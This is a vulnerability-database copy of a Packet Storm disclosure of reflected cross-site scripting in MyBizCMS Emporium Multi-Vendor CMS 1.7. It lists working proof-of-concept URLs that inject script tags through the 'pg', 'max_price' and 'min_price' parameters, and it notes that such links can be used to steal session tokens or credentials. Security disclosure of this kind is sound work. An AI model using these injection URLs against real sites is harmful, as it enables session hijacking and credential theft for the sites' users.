Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCraCkErPACKETSTORM:170826
HistoryFeb 01, 2023 - 12:00 a.m.

eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

2023-02-0100:00:00
CraCkEr
packetstormsecurity.com
175
ecommerce
marketplace
cms
cross site scripting
reflected xss
mybizcms
emporium multi-vendor
manipulate content
email
instant message
session token
login credentials
security vulnerability
JSON
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : mybizcms.com │  
│ Vendor : MyBizCMS │  
│ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │  
│ Vuln Type: Reflected XSS │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /search  
  
GET parameter 'pg' is vulnerable to XSS  
  
/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsg  
  
  
Path: /categories/phones  
  
GET parameter 'max_price' is vulnerable to XSS  
  
/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwm  
  
  
Path: /categories/phones  
  
GET parameter 'min_price' is vulnerable to XSS  
  
/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag  
  
  
[-] Done  
`
JSON